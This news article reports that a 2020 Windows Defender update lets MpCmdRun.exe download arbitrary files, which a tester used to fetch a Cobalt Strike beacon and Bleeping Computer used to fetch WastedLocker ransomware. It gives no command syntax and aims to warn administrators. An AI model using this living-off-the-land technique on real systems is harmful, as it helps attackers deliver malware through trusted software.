Windows 10's built-in antivirus can now be used to download viruses

A recent update to the built-in antivirus software in Windows 10 has taught the program a new trick—how to download files through a command line tool, including nefarious ones (trojans, spyware, ransomware, and other malware).

Downloading malware is not the intended purpose, at least I presume that's not the case. But the new function could potentially be abused in such a manner. Fortunately, this is not something the typical home user needs to worry about, not unless they're a PC masochist (more on that in a moment).

This new ability was discovered by Mohammad Askar (via Bleeping Computer), a security penetration tester and instructor who has posted hundreds of security articles, according to his Udemy profile.

"Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the 'Microsoft Malware Protection Command Line'," Askar stated on Twitter.

This effectively allows a local attacker to leverage Defender as what is called a living-off-the-land binary (LOLBin). That's when legitimate software is used for something malicious—in this case, using an antivirus program to download a virus.

Perfect peripherals

(Image credit: Colorwave)

Best gaming mouse: the top rodents for gaming
Best gaming keyboard: your PC's best friend...
Best gaming headset: don't ignore in-game audio

It appears this new ability was added to Defender with the 4.18.2007.8 update in July, so the functionality has been there for nearly two months. Bleeping Computer tested the new download switch in the command line tool and was able to download the same WastedLocker ransomware that recently caused a ruckus with Garmin's infrastructure, which prompted the company to reportedly pay a multi-million dollar ransom.

This is not quite as careless as it may seem at first glance. For one, Defender will still scan files downloaded through this method, so in theory it should still protect against malware. And secondly, this would need to be initiated by a local user.

Nevertheless, this is something system administrators should be aware of, so they can take the proper precautions. It's not unheard of for a rogue employee to cause mischief, whether they are disgruntled, are on the verge of being fired, or any other reason.

Paul Lilly

Paul has been playing PC games and raking his knuckles on computer hardware since the Commodore 64. He does not have any tattoos, but thinks it would be cool to get one that reads LOAD"*",8,1. In his off time, he rides motorcycles and wrestles alligators (only one of those is true).

Latest in Windows
Microsoft Copilot
A rather pleasing Windows 11 update bug automatically uninstalls Copilot and unpins it from the taskbar, which is jolly nice of it
Microsoft's Task Manager in Windows 11
After years of complaints about Windows Task Manager displaying CPU utilization incorrectly, a fix is finally on its way
Microsoft Windows 11
The latest Windows 11 dev build gives you the ability to snap together commonly paired apps for access in a single click, and I'm already sold
Windows 11's new emoji button in the taskbar.
You might mock Microsoft's new emoji button in Windows 11 but as someone that's explained how to quickly access emojis and special characters too many times, I get it
Windows 10 operating system logo is displayed on a laptop screen for illustration photo. Gliwice, Poland on January 23, 2022.
Valve's monthly survey reveals that almost 45% of Steam users on PC are still using Windows 10 even with the sword of Damocles hanging over them
Microsoft Windows 11
If you installed Windows 11 with certain security updates and a USB stick, you may not get any more security updates warns Microsoft
Latest in News
Crysis hero Prophet running down a beach while under fire
Crysis Remastered Trilogy activates maximum value mode as upgraded version of the legendary, hardware-crushing FPS series is currently 60% off
A goblin with sharp teeth, wearing goggles, lets out a mischievous cackle in WoW's latest patch: Undermine(d).
World of Warcraft's started swiping good ideas from one of its most popular user-made UI addons, and it's honestly about time
A female druidic figure clutches a heart riven with thorns in Hunt: Showdown
'We want to increase the cost of silence': Hunt: Showdown 1896's latest update brings a new event, a massive list of bugfixes and a tougher challenge for stealthy players
It's ENA! From the free adventure Dream BBQ!
Mindbending free multimedia adventure ENA: Dream BBQ is out now, has activated all my neurons and opened my third eye
PC Gamer magazine issue 408 Doom: The Dark Ages
PC Gamer magazine's new issue is on sale now: Doom: The Dark Ages
A gigantic terracotta sentinel made of living armor
Total War: Warhammer 3's army of Cathay has broken containment and is making its way to tabletop Warhammer at last